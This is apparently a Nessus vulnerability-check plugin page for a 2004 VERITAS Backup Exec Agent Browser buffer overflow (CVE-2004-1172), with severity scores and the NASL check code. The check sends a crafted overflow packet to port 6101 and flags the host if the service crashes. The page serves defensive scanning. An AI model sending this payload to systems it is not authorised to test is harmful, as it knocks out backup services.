10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.95 High
EPSS
Percentile
99.3%
The remote host is running a version of VERITAS Backup Exec Agent Browser which is vulnerable to a remote buffer overflow. An attacker may exploit this flaw to execute arbitrary code on the remote host or to disable this service remotely.
To exploit this flaw, an attacker would need to send a specially crafted packet to the remote service.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(16232);
script_version("1.21");
script_cvs_date("Date: 2018/08/06 14:03:14");
script_cve_id("CVE-2004-1172");
script_bugtraq_id(11974);
script_name(english:"VERITAS Backup Exec Agent Browser Registration Request Remote Overflow");
script_summary(english:"Test the VERITAS Backup Exec Agent Browser buffer overflow");
script_set_attribute(attribute:"synopsis", value:
"Arbitrary code can be executed on the remote host." );
script_set_attribute(attribute:"description", value:
"The remote host is running a version of VERITAS Backup Exec Agent Browser
which is vulnerable to a remote buffer overflow. An attacker may exploit this
flaw to execute arbitrary code on the remote host or to disable this service
remotely.
To exploit this flaw, an attacker would need to send a specially crafted packet
to the remote service." );
script_set_attribute(attribute:"solution", value:
"http://support.veritas.com/docs/273419" );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Veritas Backup Exec Name Service Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value: "2004/12/16");
script_set_attribute(attribute:"patch_publication_date", value: "2005/02/08");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/01/24");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:veritas_backup_exec");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
script_family(english:"Gain a shell remotely");
script_require_ports(6101);
exit(0);
}
port = 6101;
if (!get_port_state (port)) exit (0);
soc = open_sock_tcp (port);
if (!soc) exit (0);
request = raw_string (0x02, 0x00, 0x00, 0x00) + crap (data:'A', length:100) + raw_string (0x00) + "172.0.0.1" + raw_string (0x00);
send (socket:soc, data:request);
close (soc);
sleep(2);
soc = open_sock_tcp (port);
if ( ! soc )
{
security_hole(port);
}
Vendor | Product | Version | CPE |
---|---|---|---|
symantec | veritas_backup_exec | cpe:/a:symantec:veritas_backup_exec |